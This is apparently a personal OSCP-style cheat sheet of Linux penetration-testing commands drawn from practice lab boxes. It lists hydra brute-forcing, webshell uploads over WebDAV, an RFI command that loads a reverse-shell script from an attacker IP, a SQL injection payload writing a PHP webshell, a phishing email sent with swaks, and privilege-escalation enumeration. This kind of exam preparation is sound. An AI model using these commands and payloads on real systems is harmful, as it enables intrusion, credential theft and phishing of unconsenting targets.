Linux

Based on the following PG Practice, PG Play, and PEN-200 boxes: Amaterasu, Apex, Astronaut, BBScute, BitForge, Blogger, Bratarina, Bullybox, ClamAV, Clue, Cockpit, Exfiltrated, Extplorer, Fanatastic, Fired, Flu, FunboxEasyEnum, Gaara, GlasgowSmile, Hawat, Hetemit, Hunit, LaVita, Levram, Loly, Mantis, Marketing, Mzeeav, Nibbles, Nukem, Payday, PC, Pebbles, Pelican, Peppo, Postfish, Potato, QuackerJack, Readys, Roquefort, Scrutiny, Snookums, Sorcerer, SpiderSociety, SPX, Stapler, Sybaris, Vmdak, Walla, WallpaperHub, Wombo, Workaholic, Xposedapi, Zab, ZenPhoto, Zipper, Crystal (OSCP A), Aero (OSCP A), Berlin (OSCP B), Kiero (OSCP B), Frankfurt (OSCP C), and Charlie (OSCP C).

Foothold

Port Scan

The nmap-scan script can be found here.

$ sudo nmap-scan <target-IP>
HTTP(S)
# Dirbust with a directory list
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php,



​# Dirbust with a file list
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ
# CLI tool
searchsploit <appName> <version>

# Google dork
site:github.com <appName> exploit poc

# RFI revshell
curl --path-as-is -s "http://10.10.10.10:4443/site/index.php?page=http://192.168.45.241:443/revshell_ivan.php" --proxy 127.0.0.1:8080
uv run creds search <appName>
# POST request
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER^&password=^PASS^:F=403'

# POST request (base64-encoded credentials)
hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt 'http-post-form://target:8081/login.aspx:username=^USER64^&password=^PASS64^:F=403'
# Connect to WebDAV
$ cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

# Upload a webshell directly
$ curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!
# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output

# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/
# Dump the repository
git-dumper http://target.lab/.git git_repo

# Write all commits to a file
git log | grep commit | cut -d " " -f2 | xargs git show > commits

# Open the commits file with VSCode
code commits
# Enumeration
sqlmap -r login.req --batch
Unique Ports

SMB
sudo nmap -script=smb-vuln\* -p445 10.10.10.10
# List shares and permissions
$ uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
$ nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

# Connect and download all files
$ smbclient //target/share -p 12445
Password for [WORKGROUP\x7331]:
Anonymous login successful        
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
FTP
# Anonymous login
ftp anonymous@target
ftp ftp@target
hydra -l <user> -P <passlist> ftp://<target>
# Download dir
wget -r ftp://ftp@target_directory
ftp> put revshell_ivan.php
SMTP, POP3
smtp-user-enum -M VRFY -U anarchy_output -t 10.10.10.10
$ telnet 10.10.10.10 110
USER x7331
+OK x7331 is known here.
PASS Pass123!
+OK Welcome! 4 messages (4744 bytes)
LIST
+OK 4 messages, 4744 bytes
1 1342
2 963
3 1347
4 1092
RETR 1
# Email body with a malicious link
$ cat body.txt
Please lick here to register: http://192.168.45.170/login.html

# Send an email to multiple email addresses
$ swaks --to $(cat emails.txt | tr '\n' ',') --from it@target.off --header "Subject: ERP Registration link" --body @body.txt --server 192.168.161.137 --port 25

# Listener to receive the response
$ sudo nc -lvnp 80
Databases
# Connect
mysql -h kali -u x7331 -pPass123! --skip-ssl

# Webshell
'UNION SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/srv/http/webshell.php';-- 
# Connect
psql -h 127.0.0.1 -p 5437 -U postgresql -W
SNMP
# User-related strings
snmpwalk -v2c -c public <target> 1.3.6.1.4.1

# Public strings
snmpwalk -v2c -c public <target>

# Grep for keywords
snmpwalk -v2c -c public <target> | grep -Ei 'user|admin|name|pass|password'

# System-related strings
snmpwalk -v2c -c public <target> 1.3.6.1.2.1.1

# Running processes
snmpwalk -v2c -c public <target> 1.3.6.1.2.1.25.4.2.1.2

Privilege Escalation

User Context
$ sudo -l


$ id


$ cat /home/<user>/.bash_history
Host Enumeration
# Enumerate SUIDs
find / -type f -perm -u=s 2>/dev/null

# Enumerate capabilities
getcap -r / 2>/dev/null

# Local TCP sockets
netstat -anot

# Cronjobs
cat /etc/crontab

# Environment variables
env

# Sudo version
sudo --version

# Kernel version
uname -a
$ wget 192.168.45.216:443/linpeas.sh
$ chmod +x linpeas.sh
$ ./linpeas.sh
$ wget 192.168.45.216:443/pspy64
$ chmod +x pspy64
$ ./pspy64
grep -rH "password"
SMB
# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999
MySQL/MariaDB
mysql -h 127.0.0.1 -u x7331 -pPass123! --skip-ssl
PreviousWindowsNextCRTP

Last updated

Was this helpful?